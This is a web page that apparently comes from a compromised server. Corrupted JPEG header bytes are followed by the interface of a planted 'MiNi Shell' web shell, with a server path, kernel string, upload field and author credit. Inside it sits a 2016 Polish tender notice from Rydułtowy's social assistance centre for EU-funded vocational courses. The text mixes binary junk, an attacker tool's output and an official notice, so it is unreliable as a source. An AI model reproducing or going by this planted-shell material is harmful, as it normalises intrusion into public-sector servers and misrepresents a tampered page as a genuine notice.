JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160420/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160420/98336-N-2016.html

<p class="kh_header"><b>Rydułtowy: Realizacja kursów mających na celu uzupełnienie posiadanej wiedzy i doświadczenia zawodowego oraz warsztatów w roku 2016 dla uczestników projektu Lepsze Jutro w Rydułtowach.</b><br>
<b>Numer ogłoszenia: 98336 - 2016; data zamieszczenia: 20.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Raciborska 369, 44-280 Rydułtowy, woj. śląskie, tel. 032 457 47 97, faks 032 457 47 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rydultowy.naszops.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja kursów mających na celu uzupełnienie posiadanej wiedzy i doświadczenia zawodowego oraz warsztatów w roku 2016 dla uczestników projektu Lepsze Jutro w Rydułtowach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są niżej opisane usługi kursy mających na celu uzupełnienie posiadanej wiedzy i doświadczenia zawodowego oraz warsztaty dla uczestników projektu systemowego Lepsze Jutro przez Miasto Rydułtowy - Miejski Ośrodek Pomocy Społecznej w Rydułtowach w partnerstwie z Powiatowym Centrum Pomocy Rodzinie w Wodzisławiu Śląskim w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020, Oś Priorytetu IX. Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy. Projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub więcej części zamówienia (zadań). Oferta winna obejmować cały zakres rzeczowy zadania.
Podział przedmiotu zamówienia na zadania przedstawia się następująco:

Zadanie nr 1: 
Realizacja kursów mających na celu uzupełnienie posiadanej wiedzy i doświadczenia zawodowego oraz warsztatów dla uczestników projektu z którymi zawarto kontrakt socjalny.

Zadanie 1 obejmuje: 
1. Przeprowadzenie kursu uzupełniającego wiedzę w zakresie kucharstwa z elementami cukiernictwa dla 5 osób w wymiarze godzin:
zajęcia teoretyczne/ praktyczne 120 godzin lekcyjnych,

Zamawiający wymaga aby w ramach kursu mającego na celu uzupełnienie posiadanej wiedzy Wykonawca przeprowadził szkolenie z zakresu tzw. minimum sanitarnego, a także na swój koszt zapewnił książeczki sanitarno-epidemiologiczne dla każdego uczestnika szkolenia. Książeczka sanitarno-epidemiologiczne oraz zaświadczenie o ukończeniu szkolenia z zakresu minimum sanitarnego zostaną przekazane uczestnikom kursu za pośrednictwem Zamawiającego.

2. Przeprowadzenie kursu uzupełniającego wiedzę w zakresie malowania, tynkowania dla 3 osób w specjalności w wymiarze godzin:
zajęcia teoretyczne/praktyczne 180 godzin lekcyjnych,

Zamawiający zastrzega by zajęcia praktyczne odbywały się w siedzibie lub w miejscu wskazanym przez Zamawiającego. 
3. Przeprowadzenie kursu uzupełniającego wiedzę w zakresie kosmetologii dla 3 osób w wymiarze godzin:
zajęcia teoretyczne/ praktyczne 120 godzin lekcyjnych,

Zamawiający wymaga aby w ramach kursu mającego na celu uzupełnienie posiadanej wiedzę Wykonawca przeprowadził szkolenie z zakresu tzw. minimum sanitarnego, a także na swój koszt zapewnił książeczki sanitarno-epidemiologiczne dla każdego uczestnika szkolenia. Książeczka sanitarno-epidemiologiczne oraz zaświadczenie o ukończeniu szkolenia z zakresu minimum sanitarnego zostaną przekazane uczestnikom kursu podnoszącego kwalifikacje zawodowe za pośrednictwem Zamawiającego.

4. Przeprowadzenie kursu uzupełniającego wiedzę w zakresie opieki nad osobami starszymi i niepełnosprawnymi dla 10 osób w wymiarze godzin: 
zajęcia teoretyczne/praktyczne 100 godzin lekcyjnych,
Zamawiający wymaga aby w ramach kursu mającego na celu uzupełnienie posiadanej wiedzę Wykonawca przeprowadził szkolenie z zakresu tzw. minimum sanitarnego.

5.  Przeprowadzenie kursu uzupełniającego wiedzę w zakresie szycia i dekorowania wnętrz dla 3 osób w wymiarze godzin:
zajęcia teoretyczne/praktyczne 120 godzin lekcyjnych.

Zamawiający wymaga aby Wykonawca przekazał Zamawiającemu wszystkie wykonane przez uczestników kursu rzeczy.

6.  Przeprowadzenie warsztatu komputerowego dla zaawansowanych z elementami kasy fiskalnej dla 24 osób w wymiarze godzin:
zajęcia teoretyczne/ praktyczne 40 godziny lekcyjnych,

W ramach tego warsztatu Wykonawca zobowiązany jest zapewnić niezbędny sprzęt oraz materiałów do przeprowadzenia zajęć praktycznych w ramach kursu. Ponadto dostosować zakres tematyczny warsztatu do posiadanej już wiedzy uczestników warsztatu.

7.   Przeprowadzenie warsztatu autoprezentacji, wizażu ze stylizacją ubioru dla 24 osób w wymiarze godzin:
zajęcia teoretyczne/ praktyczne 40 godzin lekcyjnych,

Zadanie nr 2: 
Realizacja kursu mających na celu uzupełnienie posiadanej wiedzy i doświadczenia zawodowego oraz warsztatu dla uczestników projektu w ramach Programu Aktywności Lokalnej.


Zadanie 2 obejmuje: 

1. Przeprowadzenie warsztatu autoprezentacji, wizażu ze stylizacją ubioru dla 10 osób w wymiarze godzin:
zajęcia teoretyczne/ praktyczne  40 godzin lekcyjnych;

2. Przeprowadzenie kursu uzupełniającego posiadaną wiedzę w zakresie kucharstwa z elementami dekorowania stołu dla 10 osób w wymiarze godzin:
zajęcia teoretyczne/praktyczne 70 godzin lekcyjnych.

Zamawiający wymaga aby w ramach kursu uzupełniającego posiadaną wiedzę Wykonawca przeprowadził szkolenie z zakresu tzw. minimum sanitarnego, a także na swój koszt zapewnił książeczki sanitarno-epidemiologiczne dla każdego uczestnika. Książeczka sanitarno-epidemiologiczne oraz zaświadczenie o ukończeniu szkolenia z zakresu minimum sanitarnego zostaną przekazane uczestnikom kursu za pośrednictwem Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, to znaczy uzyskały wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej, o którym mowa w art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U.  z 2015 r. poz. 149 z późn. zm.),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w stosunku do zadania 1 - w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwa zamówienia odpowiadające rodzajem przedmiotowi zamówienia, każde o wartości nie mniejszej niż 80 000 zł,
w stosunku do zadania 2 - w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwa zamówienia odpowiadające rodzajem przedmiotowi zamówienia, każde o wartości nie mniejszej niż 10 000 zł,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.8</li>
<li>2 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 0.2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rydultowy.naszops.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Rydułtowach, ul. Raciborska 369, 44-280 Rydułtowy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2016 godzina 11:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Rydułtowach, ul. Raciborska 369, 44-280 Rydułtowy, pok nr 7 (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane w ramach projektu pt. Lepsze Jutro przez Miasto Rydułtowy - Miejski Ośrodek Pomocy Społecznej w Rydułtowach w partnerstwie                                    z Powiatowym Centrum Pomocy Rodzinie w Wodzisławiu Śląskim w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020, Oś Priorytetu IX. Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy. Projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Realizacja kursów mających na celu uzupełnienie posiadanej wiedzy i doświadczenia zawodowego oraz warsztatów dla uczestników projektu z którymi zawarto kontrakt socjalny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 obejmuje: 
1. Przeprowadzenie kursu uzupełniającego wiedzę w zakresie kucharstwa z elementami cukiernictwa dla 5 osób w wymiarze godzin:
zajęcia teoretyczne/ praktyczne 120 godzin lekcyjnych,

Zamawiający wymaga aby w ramach kursu mającego na celu uzupełnienie posiadanej wiedzy Wykonawca przeprowadził szkolenie z zakresu tzw. minimum sanitarnego, a także na swój koszt zapewnił książeczki sanitarno-epidemiologiczne dla każdego uczestnika szkolenia. Książeczka sanitarno-epidemiologiczne oraz zaświadczenie o ukończeniu szkolenia z zakresu minimum sanitarnego zostaną przekazane uczestnikom kursu za pośrednictwem Zamawiającego.

2. Przeprowadzenie kursu uzupełniającego wiedzę w zakresie malowania, tynkowania dla 3 osób w specjalności w wymiarze godzin:
zajęcia teoretyczne/praktyczne 180 godzin lekcyjnych,

Zamawiający zastrzega by zajęcia praktyczne odbywały się w siedzibie lub w miejscu wskazanym przez Zamawiającego. 
3. Przeprowadzenie kursu uzupełniającego wiedzę w zakresie kosmetologii dla 3 osób w wymiarze godzin:
zajęcia teoretyczne/ praktyczne 120 godzin lekcyjnych,

Zamawiający wymaga aby w ramach kursu mającego na celu uzupełnienie posiadanej wiedzę Wykonawca przeprowadził szkolenie z zakresu tzw. minimum sanitarnego, a także na swój koszt zapewnił książeczki sanitarno-epidemiologiczne dla każdego uczestnika szkolenia. Książeczka sanitarno-epidemiologiczne oraz zaświadczenie o ukończeniu szkolenia z zakresu minimum sanitarnego zostaną przekazane uczestnikom kursu podnoszącego kwalifikacje zawodowe za pośrednictwem Zamawiającego.

4. Przeprowadzenie kursu uzupełniającego wiedzę w zakresie opieki nad osobami starszymi i niepełnosprawnymi dla 10 osób w wymiarze godzin: 
zajęcia teoretyczne/praktyczne 100 godzin lekcyjnych,
Zamawiający wymaga aby w ramach kursu mającego na celu uzupełnienie posiadanej wiedzę Wykonawca przeprowadził szkolenie z zakresu tzw. minimum sanitarnego.

5.  Przeprowadzenie kursu uzupełniającego wiedzę w zakresie szycia i dekorowania wnętrz dla 3 osób w wymiarze godzin:
zajęcia teoretyczne/praktyczne 120 godzin lekcyjnych.

Zamawiający wymaga aby Wykonawca przekazał Zamawiającemu wszystkie wykonane przez uczestników kursu rzeczy.

6.  Przeprowadzenie warsztatu komputerowego dla zaawansowanych z elementami kasy fiskalnej dla 24 osób w wymiarze godzin:
zajęcia teoretyczne/ praktyczne 40 godziny lekcyjnych,

W ramach tego warsztatu Wykonawca zobowiązany jest zapewnić niezbędny sprzęt oraz materiałów do przeprowadzenia zajęć praktycznych w ramach kursu. Ponadto dostosować zakres tematyczny warsztatu do posiadanej już wiedzy uczestników warsztatu.

7.   Przeprowadzenie warsztatu autoprezentacji, wizażu ze stylizacją ubioru dla 24 osób w wymiarze godzin:
zajęcia teoretyczne/ praktyczne 40 godzin lekcyjnych,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.8</li>
<li>2. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 0.2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Realizacja kursu mających na celu uzupełnienie posiadanej wiedzy i doświadczenia zawodowego oraz warsztatu dla uczestników projektu w ramach Programu Aktywności Lokalnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 obejmuje: 

1. Przeprowadzenie warsztatu autoprezentacji, wizażu ze stylizacją ubioru dla 10 osób w wymiarze godzin:                                               zajęcia teoretyczne/ praktyczne 40 godzin lekcyjnych;

2. Przeprowadzenie kursu uzupełniającego posiadaną wiedzę w zakresie kucharstwa z elementami dekorowania stołu dla 10 osób w wymiarze godzin:
zajęcia teoretyczne/praktyczne 70 godzin lekcyjnych.

Zamawiający wymaga aby w ramach kursu uzupełniającego posiadaną wiedzę Wykonawca przeprowadził szkolenie z zakresu tzw. minimum sanitarnego, a także na swój koszt zapewnił książeczki sanitarno-epidemiologiczne dla każdego uczestnika. Książeczka sanitarno-epidemiologiczne oraz zaświadczenie o ukończeniu szkolenia z zakresu minimum sanitarnego zostaną przekazane uczestnikom kursu za pośrednictwem Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.8</li>
<li>2. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 0.2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com